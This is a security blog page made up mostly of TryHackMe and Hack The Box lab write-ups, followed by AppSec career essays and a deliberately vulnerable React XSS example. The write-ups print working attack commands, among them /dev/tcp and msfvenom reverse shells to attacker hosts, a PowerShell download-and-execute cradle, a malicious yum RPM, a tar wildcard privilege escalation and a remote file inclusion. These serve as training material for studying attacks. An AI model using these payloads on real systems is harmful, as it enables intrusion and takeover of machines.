Skip to content

Application Security Posts

THM – Daily Bungle

Amazing Spider-Man: The Daily Bugle (2020) #2 | Comic Issues | Marvel

Lab Stats

Time: 6 hours

Hint taken: 0

Difficulty: Hard

Recon

I accessed the web server. This is a blog-like application showing an item that “Spider-man” rob the bank.

Looking at the HTML, it shows that Joomla! is being used.

At first look, I am trying to find the Joomla! version in the web pages – but does not seems to have the info.

I googled for more information and found out that we can see the Joomla! version by looking at the language.

https://www.itoctopus.com/how-to-quickly-know-the-version-of-any-joomla-website

Web Enumeration

Navigate to robots.txt

I tried navigating all the directories in robots.txt. The /administrator was promising because it shows an admin panel.

But I need to find the credentials for Super User first.

Network scanning

  • ssh (22)
  • http (80)
  • mysql (3306)

It seems like the main attack vectors are the web server and database.

Gaining Foothold (1)

I tried a few SQL Injection payload in user login feature. But it does not work.

So I googled for exploit for Joomla! 3.7.0

https://raw.githubusercontent.com/NinjaJc01/joomblah-3/master/joomblah.py

Note: This requires python2

Found table:', 'fb9j5_users') Found user', ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']) (' - Extracting sessions from', 'fb9j5_session')

I will need to crack the password. First, I try to see what is the hash algorithm used for the password using online hash identifier (https://hashes.com/en/tools/hash_identifier)

I tried to use john to crack the password:
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt jonah.txt

So the password is spiderman123

I login on as jonah in the admin panel.

Getting Reverse Shell from Joomla!

This took more time.

After googling, I discover that we can change the index.php file in the template to php reverse shell.

Gaining Foothold (2)

I struggle to find the user flag manually. So I decided to run some Linux Enumeration scripts.

I used python command to spawn:
python -c 'import pty; pty.spawn("/bin/sh")'

Mistakes

I went through my Linux PE checklist and none of the checks is working.

I saw we have an account:

  • jjameson:x:1000:1000:Jonah Jameson:/home/jjameson:/bin/bash

In addition, I tried to check a few things:

  • Trying all the SUID binaries to see if I can escalate privileges -> Doesn’t work
  • Looking for Kernel Exploits -> Doesn’t work

Then during the linpeas enumeration, I saw a database password was discovered.

  • Test if mysql has any exploit and whether it is running as root -> Doesn’t work
    • I tried to login as root: mysql -u root -p -D joomla
    • But there are nothing useful there.
  • I tried looking for Linux exploits and sudo exploits -> Doesn’t work
  • No progress. I am going to login as jjameson in SSH. I tried bruteforcing but it does not work.

How I realize my mistakes?

At this point, I have not made any progress other than finding the database password.

MYSQL Password
user: root
pw: nv5uz9r3ZEDzVjNu

So I read through the checklist of other hackers.

This helps alot: https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html

I realized my mistake. I should check if the discovered passwords are being reused for SSH and not rely on brute-forcing only.

SSH – Login Checks Methodology

  1. Check if whether the known passwords are reused? Do this for every new password discovered during enumeration
  2. If not, then try to bruteforce.

I took 4 hours to figure out that the database password is reused as jjameson ssh password.

Privilege Escalation

Now I can login as jjameson.

The first thing I do is to run sudo -l

I saw that this account can run sudo yum.

Yum PE

Good article: https://medium.com/@klockw3rk/privilege-escalation-how-to-build-rpm-payloads-in-kali-linux-3a61ef61e8b2

First I need to install fpm and rpm.

git clone https://github.com/jordansissel/fpm
cd fpm
sudo gem install fpm
sudo apt-get install rpm

Then create a root.sh file with the payload:

#!/bin/bash

bash -i >& /dev/tcp/[ATTACKER IP]/3333 0>&1

Then create the package with root.sh:

fpm -n root -s dir -t rpm -a all --before-install root.sh .

Start a nc listener at port 3333.

Download the package in the target machine and install:

sudo yum localinstall -y [package name].rpm

In the listener, we will receive connection as root user.

THM- SkyNet

Recon

Network Enum

I ran a nmap scan on the target machine.

  • ssh (22): Worth exploring
  • http (80): Web server is running
  • pop (110): Maybe an email server is running?
  • netbios-ssn (139): Worth exploring
  • imap (143): Maybe an email server is running?
  • microsoft-ds (445): SMB is worth exploring

Web Enum

I ran gobuster to spider the directory in the web server

gobuster dir -u http://10.10.134.0:80/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 40

From the scan result, I see these are directories found:

  • /admin
  • /css
  • /js
  • /config
  • /ai
  • /squirrelmail (this will be interesting to explore)

Most of the directories are restricted.

The squirrelmail page is working but I will need the login credentials.

I don’t have the credentials at the moment. So now the goal is to find out the email credential.

Service Enum

Now I am going to look at the SMB service running at port 445.

I ran the command to connect to the SMB’s anonymous share

smbclient //[TARGET IP]/anonymous

The files look promising to find a clue on how to get the email credentials.

I ran another command to get the content of the SMB share:

smbget -R smb://[TARGET IP]/anonymous

After inspecting the content, I found a list of possible passwords (maybe they belong to Miles?).

Using Burp Intruder, I brute-force the password with username (milesdyson).

Eventually, the password for milesdyson is cyborg007haloterminator

Once I login as milesdyson, I saw a bunch of emails. After reading one of the email, I saw that the SMB password for milesdyson was leaked.

To summarize, these are the found credentials:

Username: milesdyson

Email Password: cyborg007haloterminator

SMB Password: )s{A&2Z=F^n_E.B`

I tried to connect to the SMB milesdyson share with the username and password:

smbclient //[TARGET IP]/milesdyson -U=milesdyson

Then I manage to login to milesdyson share.

At first glance, most of the files are some machine learning pdf.

I went into the notes folder. There are a bunch of markdowns.

But I spotted a textfile named as “important.txt”.

Inside this important.txt file, I saw that milesdyson have a custom CMS with the link “

Spider the directory in the CMS.

Initially I had an issue because I didn’t put the backslash for the URL.

After I have done so, I ran this command:

gobuster dir -u http://10.10.134.0:80/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 40

  • /administrator was found.

Navigate to this directory and I can see a CMS named “Cuppa CMS”.

Foothold

To summarize, I found three possible ways to gain a foothold into the system.

  • ssh
  • squirrelmail
  • Cuppa CMS

ssh

I tried to brute-force using hydra with username

hydra -l milesdyson -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-500.txt [TARGET IP] ssh

But this does not work.

Squirrelmail

I searched for possible exploits for squirrelmail (version 1.4.23).

There is an interesting exploit for RCE.

https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html

I followed the steps but the exploit does not work.

Cuppa CMS

I struggle to find the credentials to login to Cuppa CMS (tried with milesdyson credentials to see if password is reused).

I searched for Cuppa CMS exploit and this seems promising

https://www.exploit-db.com/exploits/25971

Basically, we can call a remote file without login to Cuppa CMS.

The examples given in the exploit

http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Now I started a python server so that the CMS can call my shell files.

I tried a few ways to execute a shell.

For example, a basic php web shell with CMD param. But this does not work.

I look for more information about the configuration file.

http://10.10.134.0/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php

It seems like there is a file extension restriction. For example, txt and jpeg are allowed. But php is not allowed.

I tried to create a php reverse shell and then change the magic number of the file to jpeg using hexeditor. This will make the Linux machine interpret the file as a jpeg file.

I started the nc listener.

I ran the command to call the php reverse shell:
http://10.10.134.0/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.4.3.145:8889/php-reverse-shell.php

This works and I have shell to the machine.

Immediately I enter the id and whoami command to check what is this account.

This account is “www-data”

I can also find the usr flag in milesdyson home directory

Now I gained a foothold, I will need to escalate privilege.

Privilege Escalation

I tried to use sudo but there is an error. It seems like the shell is “jailed”.

Basically we need to spawn a tty shell. (Link: https://netsec.ws/?p=337)

I used python command to spawn:
python -c 'import pty; pty.spawn("/bin/sh")'

Now I can sudo but this seems useless since I don’t know the password of the current user “www-data user”.

Then I ran some Linux enumeration scripts (lse.sh and LinEnum.sh).

It seems like the possible vectors are the crontab and the suid binaries.

I tried with the suid binaries and struggled because of the sudo issue where I don’t know the password. So much time wasted here

So I looked at the crontab. It seems like there is a backup.sh job executed by the root user.

I looked at the content of backup.sh:

#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

So the root user cd into /var/www/html and then perform a backup.

Well I think I am in control of the /var/www/html folder.

I looked at the Linux PE checklist again and found a similar attack vector with the use of wildcard in tar.

https://app.gitbook.com/@bobbylin/s/oscp-playbook/privilege-escalation/linux-privesc#wildcards

I should follow the exact steps. I observed that I miss out one step.

I created two files:

touch /home/user/--checkpoint=1 
touch /home/user/--checkpoint-action=exec=shell.elf

Then I created the shell.elf in attacker machine and download in target machine.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=[ATTACKER IP] LPORT=3333 -f elf -o shell.elf

Now I started the listener at the correct port and wait.

After a few minutes, there are no connection from target machine.

This is when I took a hint and saw that there is something wrong with my shell file

I changed the command to:

touch "/home/user/--checkpoint-action=exec=sh shell.elf"

This works and I managed to connect as root.

Look for the root.txt under root directories.

THM – HackPark: Hacking Windows with Hydra, RCE & WinPEAS

Navigate to the Application and explore the features. You will notice a Login page.

We need to identify a possible username for brute-forcing the credentials. When we look at the blog post, we can see an author named “admin” or “administrator”.

Using Burp Intruder, we can brute-force the password using Seclist’s common credentials:

10-million-password-list-top-100.txt
10-million-password-list-top-500.txt
10-million-password-list-top-1000.txt
10-million-password-list-top-10000.txt
10-million-password-list-top-100000.txt

We found the password: 1qaz2wsx

When we login, we can identify the version of blogengine.

Search for exploits in exploit-db. Choose the verified exploit:

Save the file as PostView.acsx

Once the file is uploaded, we can see the file in File manager.

Start a nc listener in the attacker machine: nc -lvnp 4444

Navigate to <Target Machine>/?theme=../../App_Data/files

Once you gain initial access to the server, we will pivot from netcat to a more stable shell.

Generate a reverse shell exe;

msfvenom -p windows/shell_reverse_tcp LHOST=[Attacker IP] LPORT=3333 -f exe -o shell-x86.exe

Download the shell and Winpeas to C:\Windows\Temp\ (this is world writable).

We can run winPEAS.bat and we can see the uncommon service “Windows Scheduler” running.

cd to C:\PROGRA~2\SYSTEM~1

Examine the files in the directory to see if there are any useful information.

In the Events folder, we can see that Message.exe is being executed by Administrator periodically.

Replace the Message.exe with another reverse shell payload. Rename the existing Message.exe to old_message.exe

In Attacker machine, generate the reverse shell:

msfvenom -p windows/shell_reverse_tcp LHOST=[ATTACKER IP] LPORT=5555 -f exe -o Message.exe

Download the Message.exe (reverse shell) to the folder:

powershell -c wget "http://[ATTACKER IP]/Message.exe" -outfile "Message.exe"

cd C:\Users\Administrator\Desktop and we can see the root.txt flag.

THM – Alfred: Exploiting Jenkins

Link: https://tryhackme.com/room/alfred

Recon

Run nmap [Target Machine IP]

There are 3 ports open (TCP connect).

Open [Target Machine IP]:80 and [Target Machine IP]:8080.

[Target Machine IP]:8080 is a login page to Jenkins. Google for the default password of Jenkins (admin:admin).

Once you login, you will see a build. If you look at the build job, you can see that this is a Windows machine. Configure the job and insert the reverse shell to the build command:

powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

Download this powershell in attacker machine and host the file with python server (port 8888).

Run nc -lvnp 4444 in attacker machine. Then trigger a build in this job.

We will get a shell from the Target machine. Look for the user.txt (usually it is in the one of the user’s document or desktop folder).

Th

e text contains:

Upgrade shell

Generate a payload

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[ATTACKER IP] LPORT=3333 -f exe -o shell.exe

Open the msfconsole in attacker machine and run these commands (line by line):

msfconsole
use exploit/multi/handler 
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST [ATTACKER IP] 
set LPORT 3333
run

Download the shell.exe into the Target machine using Jenkins.

powershell "(New-Object System.Net.WebClient).Downloadfile('http://[ATTACKER IP]:8888/shell.exe','shell.exe')"

In the machine, run Start-Process shell.exe to upgrade the shell.

If this is successful, you will see the output in the msfconsole


Privilege Escalation with Access Token

Find out what is the privilege of the user using whoami /priv

In msfconsole, load incognito and run list_tokens -g to find out the available tokens.

Run impersonate_token “BUILTIN\Administrators” command to impersonate the Administrators token

migrate PID-OF-PROCESS

Start a shell.

Application Security – Career Guide 2021

I have collated this Application Security Career Guide from market demands and my understanding of current industry trends and practices. The guide describes some of the important skill-sets for someone who are interested in AppSec:

  • Engaging Stakeholders
  • Conduct Training
  • Develop guidelines and best practices
  • Design Review
  • Vulnerability Assessment and Penetration Testing (VAPT)
  • Conduct Research on Industry trends and Community Contribution
  • Security Automation

I also included some additional information such as:

  • InfoSec and Audit Certifications
  • Programming Languages
  • Compliance and Regulations knowledge
  • Hands-on experience with Tools
  • Knowledge on Web Security, OS, Authentication, Network, Cryptography etc.
  • Common Tech stack to know
  • AWS Security Services
  • AWS Experiences

Feel free to let me know if you think there are some skills and info that needs to be added.

How do you conduct your Breadth studies?

Breadth studies are any studies which takes you outside of your field of specialization. You want to do breadth studies as it helps you to rest from your field of specialization.

Today, there are so much information about different subjects from books, MOOC and internet blog posts. We need an approach on how to conduct our breadth studies without becoming a dilettante and make the studies to be sustainable.

Criteria for picking subjects

Don’t learn something for the sake of learning or because it is popular (appearing in media and news article). Instead, consider using below criteria as a guide to your decision:

  • Humanity-Natural reason: Subjects that makes you be more connected as a human and to nature.
  • Complementary reason: Subjects which helps to advance yourself further in your field of specialization.
  • Exploratory reason: Subjects in which you might want to add to your specialization but unsure now.
  • Practical-Living reason: Subjects which teaches you how to live practically in modern world.

One of the most practical truths that Daniel Miessler shared is that learning is an integration problem. When you learn something new, you have to decide whether to integrate this new thing into your life and work.

There are many techniques available (e.g. Spaced Repetition) which can help you memorize this new thing that you are learning. At some point, you cannot just remember things. You need to consider whether to integrate this thing into your life or dropped it because it is too difficult to integrate into your work / life.

For Breadth studies, you will face the integration problem. If you cannot integrate what you learned in your Breadth studies to your actual work or life, then it will not be sustainable. Think hard about how you can use this thing that you have learned.

How do you know what truly engages you?

I felt that many news, tweets, YouTube videos, blogs and forum / aggregators are constantly to trying to engage my attention. As a result, I struggle to know what are the things that I truly find it engaging.

Everything seems engaging to me because they looks new and something that I don’t know. But I seldom have any sustainable engagement with these resources. Therefore, I should not use these resources as a measurement of what I truly want to engage in.

Instead, I should try to study and practice the foundations of these resources that I am often trying to look into. Only with a sustainable study of these foundational fields, then you can truly know what engages you the most.

The “question” heuristic

How do you know what truly engages you? Use the simple heuristic: If you have many questions while studying the fields, the chances are that this field of work engages you the most compare to other fields.

You might also find other fields to be engaging as well but not something you want to deep-dive. In that case, you should treat them as breadth studies (just by knowing the fundamental principles should be sufficient).

Beware of judging that a field is not something that engages you just because you have no questions while doing an initial study.

There is also a possibility that you are using the wrong resource to study (that is why you don’t even know what to ask to find out more). A good resource brings out more questions from your mind. Or you are missing some knowledge or real life experience to ask any questions. Thus, you cannot pre-maturely judge that the subject does not engage you because you have no questions now.

But if you have done a thorough study and yet the questions are not flowing out of your mind, the chances are that the field is not engaging enough to your current life context.

HTB Writeup: Legacy w/o Metasploit

Overview

Recon

Quick Scan:

sudo nmap -sC -sV -O -oN nmap/quickscan.txt 10.129.125.96

Two services are identified:
1. netbios-ssn (port:445, likely to be SMB)
2. microsoft-ds

According to the scan result, the victim box is likely to be Microsoft Windows XP SP3 (94%) or Microsoft Windows Server 2003 SP1 or SP2 (92%).

nmap results

Enumeration

We can use nmap to check if the machine is vulnerable to any public CVEs.

locate *.nse | grep smb

Run the script to check the vulnerabilities.

sudo nmap –script smb-vuln* -p 445 -oN nmap/smb_vulns.txt <victim box IP addr>

We can also google for exploit relating to Windows XP SP3 and SMB.

From our enumeration, we can try these two exploits:
1. MS08-067
2. MS17-010

Exploit

MS08-067

Convert this script to python3: https://raw.githubusercontent.com/andyacer/ms08_067/master/ms08_067_2018.py

Start the netcat listener:

nc -nlvp 443

Get Local Machine IP:

ip addr | grep tun0

Generate the shellcode using msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=<LOCAL MACHINE IP> LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

Copy the shellcode to exploit.py script.

Run the exploit script (make sure you have pip3 install impacket).

Remember that the machine is Windows XP and likely to be SP3. So let’s choose choice 6.

python3 exploit.py <VICTIM BOX IP ADDR> 6 445

There will be a callback on the listener:

The root.txt is in the Desktop folder.

Reflections on the lab

It took me days to achieve a successful exploit. One of the reason is that I was spending two days on debugging python2 exploit scripts for MS17-010 (eternalblue). There is some issue in using pip2 to install impacket. Therefore I targeted MS08-067 instead.

  • If you are stuck with debugging issue, you need to time-box and move on. You can revisit the issue in the future. Eternalblue is one of the famous NSA exploit. I will definitely need to figure out how to fix the issues when running the exploit script.
  • I confused LHOST as the IP address of the victim box. Instead I should remember that LHOST is the IP address of the local VM.
  • You can enumerate issue using nmap as well and not just with searchsploit.
  • Convert python2 scripts to python3 scripts with online tool such as this.

HTB Writeup: Lame w/o Metasploit

Overview

  • Run two nmap scans to determine the open ports, services and OS.
  • Based on the discovered information, search for possible exploits.
  • Look for exploits scripts for each service versions for gaining root.
  • Test the exploits to see if the discovered services are exploitable.

Recon

nmap options

  • -O <Enable OS detection
  • -sC <Run default scripts>
  • -sV <Probe open ports to determine service/version info>
  • -oA <Output to all format>
  • -p- <Scan all ports>

Quick scan

sudo nmap -sC -sV -O -oA quickscan 10.10.10.3

Full scan

sudo nmap -p- -sC -sV -O -oA fullscan 10.10.10.3

We can see there is an additional service that is not discovered by the quick scan


Enumeration

We discovered five attack surfaces from our port scanning results. They are:

  1. ftp (port:21, version: vsftpd 2.3.4)
  2. ssh (port:22, version:OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0))
  3. netbios-ssn (port:139, version:Samba smbd 3.X – 4.X (workgroup: WORKGROUP))
  4. netbios-ssn (port:445, version:Samba smbd 3.0.20-Debian (workgroup: WORKGROUP))
  5. distccd (port:3632, version: distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

FTP

One convenient way of checking if the service version has an exploit is to use the searchsploit tool in Kali Linux. Here we can see that this particular FTP version has a reported exploit.

We can try googling for a python exploit. I found this in github:

https://github.com/ahervias77/vsftpd-2.3.4-exploit/blob/master/vsftpd_234_exploit.py

However, when I executed the script, the exploit was not successful. The script was stuck and did not progress further.

SSH

There were a few user enumeration attack on SSH. This usually takes time and we can come back if the other services are not exploitable.

Samba

This particular version of Samba has exploit available.

I found an exploit script in Python: https://github.com/macha97/exploit-smb-3.0.20/blob/master/exploit-smb-3.0.20.py

You will need to update the script by following the steps below:

  • Get your LHOST:ip addr|grep tun0
  • Generate the reverse netcat buffer payload:msfvenom -p cmd/unix/reverse_netcat LHOST=<Your LHOST> LPORT=<Specify any port> -f python
  • Replace line 8 to 15 with the generated payload from msfvenom.
  • Update victim IP to the box IP address.
  • Remove line 1.
  • Install pysmb: pip install pysmb

Exploit

Samba

  • Start netcat: nc -nlvp 1337
  • Run the exploit: python3 exploit-smb-3.0.20.py

Now can run command now to get the FLAG in as the root user.


Reflections on the lab

This was the first lab that I have completed in Hack The Box (HTB). I learned a few things here:

  • This is abit different from purely web application hacking that I am more familiar with. You need to perform recon and systematically enumerate the services.
  • You need to know how to look for exploits, modifying and debugging the scripts that you found online.
  • You need to know some tools such as msfvenom, netcat and python etc.
  • Also port scanning needs to be thorough in order to discover more services that the quick scan does not find.

Crafting your AppSec Learning Methodology

Information Security is a broad field with many specialties such as Infrastructure Security, Cloud Security, Container Security. DevOps automation and Application Security (Source Code / Design level) etc. In real life context, an Application Security may need to focus on a few specialties since modern applications are using Cloud PaaS / IaaS and Containers.

Since there are so many specialties to learn, you may get overwhelmed by the knowledge and how to apply what you learn on the actual context. I read an interesting Div0 post on a cybersecurity career discussion panel on this topic:

Many aspiring cybersecurity practitioners say they are passionate about cybersecurity. But they have no work to show/prove their passion. Don’t just say you are passionate. Do it, show it!

There’s no shortage of aspiring cybersecurity practitioners who want to learn. However, there’s a lack of drive on how they can contribute to the organization. Continuous learning in a fast-moving industry like cybersecurity is important. However, you should also focus on how you can apply your skills (emphasis mine).

Cybersecurity is not just about technical skills. In fact, picking up technical skills is the easy bit. Shaping your attitude and mindset in how you deliver the promise your clients entrusted in you plays a much bigger role.

An essential characteristic to have in the industry is Grit — the passion and sustained persistence towards long-term achievement.

In a wide discipline like cybersecurity, it is important to collaborate and bounce ideas with fellow practitioners — that’s how you push the boundary.

The mad rush to get all the fancy certifications is not healthy. There’s no point being certified but you still can’t get a complete grasp on security controls or even the fundamentals. Focus on building up your skillset, not the alphabets behind your name.

Often Application Security new joiners have to learn development skills on their own projects if they are not joining from development background. They may be pentesters, sysadmin, DevOps engineers or career changers coming from another field. Each of them have their own unique perspectives.

You need to understand development but…

If you see in many Application Security job descriptions, many companies require development background. This requirement ensures that you can empathize with the development team that you will be working closely with.

Be careful not to become too developer-like because you will lose independent assessment since you are too close to the development team. For example, some developer tells you that this SQL injection is not a risk since the string values come from hardcoded config file. If you get too close to dev team, you might accept the risk without pointing out additional caution.

However, from another independent perspective, this means that SQL injection can happen if a rogue developer / QA / devops change the config file to a SQLi payload. The long-term solution is actually to use parameterized query and prepared statement even though the values are hardcoded. However if you get too close to dev team, you will start to feel their pain and deadlines if the feature is not released on time. So you might not even suggest the team to pick a more secure approach. Or you might ask the team to add this suggestion to backlog. It remains to be seen whether the safer approach will be adopted since there is always another new feature to complete.

Security Champions might also struggle to give independent assessment especially since they are part of the dev team. Moreover, many of them are developers or QA and have deadline and user stories to complete as well. Therefore Security Champions cannot do it alone and need pairing with the internal Security SME to give a balanced assessment.

On the other hand, you are too far from the development team, you will start suggesting crazy security activities from some PDFs or slides that will never gain any traction with the development team. Many good ideas sound great in powerpoint slides but difficult to gain traction in practice because real world has more decision-making factors in which security is just one of them. You need to at least understand some of these major factors such as business risk appetite, ROI, regulatory requirements etc.

Not enough to learn Development

To understand Application Security in depth, the newbies have to pick up coding and software development concepts such as MVC etc. on their side projects or on the job. It will take time and requires a lot of experimentation, readings, note-taking and questioning.

You shouldn’t just learn coding like watching a Udemy course on Web Development or Mobile Development. After all, your job also consist of the security aspects of delivery. Most of the development courses will not mention Application security topics. This means that you need to create your own contexts to apply every topics that you have watched on Application Security.

An example of I apply newly learned security knowledge to coding

Recently, I attended an online webinar on building secure React applications. This is an informative talk with hands-on examples that I recommend people to watch.

My first thought is to find the React code that I wrote on my own.

import React from 'react';

const Option = (props) => {
    return (
        <div>
            <li>{props.name}</li>
            <button
                onClick={(e) => {
                    props.handleDeleteOption(props.name);
                }}
            >
                Remove
            </button>
        </div>
    );
};

export default Option;

Previously, my understanding was that ReactJS is secure by default library and XSS is difficult to achieve unless developer use dangerouslySetInnerHTML. But from the video, I updated my understanding of ReactJS and recognized more XSS attack surface.

Then I tried to modify my React component code to create the XSS vulnerability. Imagine the developer thinks that getting the name from props is safe to use in href.

import React from 'react';

const Option = (props) => {
    return (
        <div>
            <li>{props.name}</li>
            <a href={props.name}>Click for more info</a>
            <button
                onClick={(e) => {
                    props.handleDeleteOption(props.name);
                }}
            >
                Remove
            </button>
        </div>
    );
};

export default Option;

But if the attacker include JavaScript url, then there is a stored XSS issue.

From now, when I look at ReactJS code, I will also include such checks in my code review methodology. Or when I am looking at ReactJS app, I will be more awareness of more things to look out for such as href and src tags etc.